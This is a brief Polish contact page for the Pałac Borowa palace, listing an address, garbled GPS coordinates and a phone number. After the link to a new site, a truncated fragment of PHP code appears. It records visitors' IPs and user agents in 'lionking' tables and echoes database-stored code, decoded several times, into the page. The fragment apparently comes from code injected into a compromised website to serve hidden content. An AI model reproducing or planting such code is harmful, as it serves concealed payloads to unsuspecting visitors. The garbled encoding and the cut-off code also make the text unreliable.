facebook-icon
Pa�ac Borowa

Kontakt

Pałac Borowa
Borowa, ul. Lipowa 34
55-093 Borowa

GPS:
17°°16''38' E
51°°11'25' N

tel. 727 507 307

Zapraszamy na nową stronę pałacu:
= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>